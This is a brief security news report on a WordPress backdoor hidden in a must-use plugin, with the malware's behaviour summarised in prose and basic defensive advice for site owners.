269/68 Friday, July 25, 2025
Cybersecurity experts at Sucuri have uncovered a new tactic used by threat actors to exploit WordPress systems by embedding a backdoor into a special type of plugin known as a “mu-plugin” (Must-Use Plugin). These plugins are placed in the wp-content/mu-plugins directory and are automatically enabled on every WordPress site without requiring manual activation. Crucially, mu-plugins do not appear in the WordPress admin dashboard’s Plugins page, allowing malware to operate stealthily without raising suspicion.
According to the analysis, attackers deployed a PHP script named wp-index.php in the mu-plugins directory. This script loads malicious code from a remote server using a URL that is obfuscated with ROT13 encoding. Once the code is retrieved, it is written temporarily to disk and executed immediately. The malware also embeds a hidden file manager into the active website theme and creates a new administrator account named “officialwp”, installing an additional malicious plugin called wp-bot-protect.php to maintain full control over the site. Furthermore, it has the ability to reset common admin usernames’ passwords such as “admin,” “root,” and “wpsupport” to attacker-defined credentials.
Security analysts warn that once such a backdoor is installed, attackers can execute arbitrary actions on the compromised site – including data theft, malware propagation, or redirecting visitors to phishing or scam pages. Website owners are strongly urged to:
- Regularly update WordPress core, themes, and plugins
- Enable two-factor authentication (2FA) for admin accounts
- Routinely inspect the file structure, especially in theme and plugin directories
- Check for unknown files or unauthorized user accounts
Source https://thehackernews.com/2025/07/hackers-deploy-stealth-backdoor-in.html
